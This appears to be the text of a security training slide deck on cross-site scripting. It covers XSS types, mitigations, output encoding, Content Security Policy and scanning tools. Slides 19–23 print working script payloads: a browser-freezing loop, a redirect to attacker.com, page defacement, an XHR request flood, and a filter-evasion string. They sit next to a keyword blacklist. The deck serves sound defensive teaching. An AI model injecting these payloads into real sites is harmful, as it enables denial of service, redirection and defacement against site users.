Devouring Security: Insufficient Data Validation Risks - Cross Site Scripting (XSS) • Risk, Stories & the news • XSS Anatomy • Untrusted Data Sources – Well, Where did that come from? • Shouldn’t it be called CSS instead? • Types of XSS - Type 0 [DOM based] - Type 1 [Reflected or Non-persistent XSS] - Type 2 [Persistent or Stored XSS] • Live Demo: XSS 101 with alert('hello XSS world') • Live Demo: Cookie Hijacking and Privilege Escalation - Face/Off with John Travolta and Nicolas Cage • Live Demo: Let’s deploy some Key loggers,huh? • Mitigations - Input Sanitization - Popular Libraries for .Net, Java, php  Demo: Input sanitization - Whitelists (vs. Blackists) - Output Encoding  Contextual  Demo: Output Encoding - Browser Protections & bypasses - Framework Protections & bypasses - Content Security Policy (CSP) in brief • Secure Code reviews: Spot an XSS, How? • Tools: Do we have an option? • XSS Buzz and how to Fuzz • Renowned Cheat sheets • Further reading & References

1. Devouring Security
Insufficient Data Validation Risks
Cross Site Scripting
Marudhamaran Gunasekaran
Watch the screen recording of the presentation at https://vimeo.com/106302349

2. disclaimer
• Techniques and Tools in this presentation should be used or applied
on an application, only with prior consent of the application’s owner.
Illegal otherwise.

3. Irrational fear of risks against our children
https://www.schneier.com/blog/archives/2014/08/irrational_fear.html

4. Perfect security?
http://infosanity.files.wordpress.com/2010/06/dilbert-securitycia.gif

5. Information Security Triangle

6. XSS
• Html equivalent of Sql injection? Some say – it indeed is
• “Breaking out of a data context and entering a code context” – Jeff
Williams, Chairperson, OWASP

7. XSS Anatomy
• Benign Input: http://app:8020/odern/AdvSearch?q=xxxxx
• Input: xxxxx | Output: xxxxx
• Malicious Input:
http://app:8020/odern/AdvSearch?q=<em>xxxxx</em>
• Input: <em>xxxxx</em> | Output: <em>xxxxx</em>
• Malicious Input failure:
http://app:8020/odern/AdvSearch?q=<em>xxxxx</em>
• Input: <em>xxxxx</em> | Output: &lt;em&gt;xxxxx&lt;/em&gt;

8. XSS Anatomy
• Remember your high school?
How you used to print a < > symbol on a html page by &lt; &gt;

9. Parsers in Browsers
Html
Parser
CSS
Parser
JavaScript
Parser

10. XSS
• Breaking out of data context and entering the code context?
• By Code context? Do I mean?
• Html markup
• Html attributes
• JavaScript
• CSS (not the XSS CSS, but the Cascading Style Sheet CSS)
• xml

11. Sources of untrusted data
• Url
• Form data
• Cookies
• Request headers
• External services
• Database
Request[“data”]
$_REQUEST
request.getParameter

12. Demo: XSS 101
• We know <script>alert(‘xss’);</script>
how about some Samy script?

13. Samy - http://namb.la/popular/tech.html
Formatted code: http://security.stackexchange.com/questions/37362/why-is-the-samy-worm-considered-xss

14. http://www.zdnet.com/tweetdeck-xss-worm-goes-viral-7000030436/

15. Auto send FB credentials to the Tunisian
government via inserted javascript on non-https
connection

16. XSS Types
• Type 0 – DOM Based
• Type 1 – Reflected or Non-persistent XSS
• Type 2 – Persistent or Stored XSS

17. Demo: Cookie hijacking and Privilege
Escalation
• Face/Off with John Travolta and Nicolas Cage

18. Demo: Cookie hijacking and Privilege
Escalation
• John Travolta – FBI
• Nicolas Cage – Terrorist that planted the bomb.
• Where is the bomb? John Travolta would find it by tricking Nicolas Cage

19. My fave Payload: Dos the client
<script>var j=0;while(true){++j;setTimeout(function(){var
i=0;while(true){++i;setTimeout(function(){var
w=0;while(true){w++;}},0);}},0);}</script>

20. My fave Payload: Redirection
• <script>window.top.location=http://www.attacker.com;</script>

21. My fave Payload: Defacing
• <script>document.body.background=http://1.bp.blogspot.com/-
ISLWH3-
kFpo/Uai4UHCOcrI/AAAAAAAAAmA/a6y9Nq3Bk0g/s1600/logo_blue.
gif;</script>

22. My fave Payload: Short XHR
• <script>cn=1;while(true){++cn;var
w=window,r=w.XMLHttpRequest,j;if(r)r=new r();else for(j
in{"Msxml2":1,"Microsoft":1})try{r=new
ActiveXObject(j+".XMLHTTP");break}catch(e){}r.open("GET",documen
t.location,false);r.send("");}</script>
• Better yet.. If you have jQuery
<script>$.get('http://prowarenesssecurity:8000/Pss/c.aspx‘);</script>

23. Input Sanitization
• Blacklist
• Stop anything that starts with a < and followed by a character
• Stop any words such as script, javascript, alert, xss
• Stop the < > , “ ‘
• Fails because of elimentary evasive techniques like
• <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
(Rsnake)

24. Blacklist vs Whitelist
• Blacklist – Don’t allow just the bad things I tell you, rest is fine
• What is bad? – anything that is bad today, anything the developer thinks
• Whitelist – Allow only these, I don’t care about the rest
• What is good? – anything the business requires in the functionality

25. Don’t write your own Input Sanitizers
• http://blog.codinghorror.com/protecting-your-cookies-httponly/

26. AntiXss libraries
• Microsoft AntiXss
• AntiSamy for .Net, AntiSamy for Java
• Reform for php

27. Microsoft AntiXss
• InputSanitizer
• For purifying html input
• Encoder
• For output encodring

28. Output encoding libraries
• https://www.owasp.org/index.php/OWASP_Java_Encoder_Project

29. HttpOnly please!

30. Framework protections
• Ruby on Rails, ASP.Net MVC
• XSS protections by default by output encoding
• But why developers don’t like it?
• Why do they want to turn the framework protections off?
• Because they just do not want output encoding by default because it just does not look right
• Because they want plain html to be rendered at the UI
• Say hello to ASP.Net MVC’s Html.Raw()

31. Framework Protections – Input validations
• ASP.Net’s Request Validation
• Why is it there? When does it get triggered? Could we bypass it? Sure.
• <httpRuntime requestValidationMode="2.0" />
• AllowHtml
• ValidateInput(false)
• ValidateRequest=false
• Request.Unvalidated….
Use explicit input validation, or AntiXss libraries
when you have request validations turned off

32. Browser defenses
• IE
• Chrome
• Safari
• X-XSS-Protection: 1; mode=block

33. Browser defenses and bypasses
• https://www.sysdream.com/sites/default/files/Abusing_IE8s_XSS_Filt
ers%20(1).pdf
• https://blog.whitehatsec.com/internet-explorer-xss-filter/
• http://blog.elevenpaths.com/2014/01/how-to-bypass-antixss-filter-in-
chrome.html

34. XSS Defences
• NoScript addon
• Content-Security-Policy [No wide browser support yet especially IE]

35. Content Security Policy
• ‘xxx’ is the only domain you should my
• Scripts
• Styles
• Images
• Objects
from

36. Content Security Policy
• Blocking mode
• Reporting mode

37. Content Security Policy
http://content-security-policy.com/

38. Content Security Policy
http://content-security-policy.com/

39. Tools: Watcher Addon for Fiddler (Passive scanning)

40. Tools: Xss Me addon for firefox (Active
Scanning)
• Demonstration at http://testfire.net/

41. Tools: Xenotix XSS Exploit Framework

42. Tools: ModSecurity (Web Application Firewall)

43. Tools: Zed Attack Proxy

44. Tools: Commercial tools?
• Go figure, shell out

45. XSS: Spot during code review
Source: 24 Deadly Sins of Software Security: Programming Flaws and How to Fix Them

46. XSS: Spot during code review
Source: 24 Deadly Sins of Software Security: Programming Flaws and How to Fix Them

48. Output encoding options
• php:
• echo htmlentities($name)
• ASP.Net code behind:
• lblName.Text = "Hello, " + HttpUtility.HtmlEncode(txtValue.Text);
• lblName.Text = "Hello," + AntiXss.HtmlEncode txtValue.Text);
• ASPX view engine :
• <%: data %>
• Razor view engine:
• @data

49. Code Review Tools
• Cat.Net still works with little tweaking on al older code base
• Visual Code Grepper

50. Popular cheatsheets for XSS prevention
• https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
• http://opensecurity.in/the-ultimate-xss-protection-cheat-sheet-for-developers/

51. :q!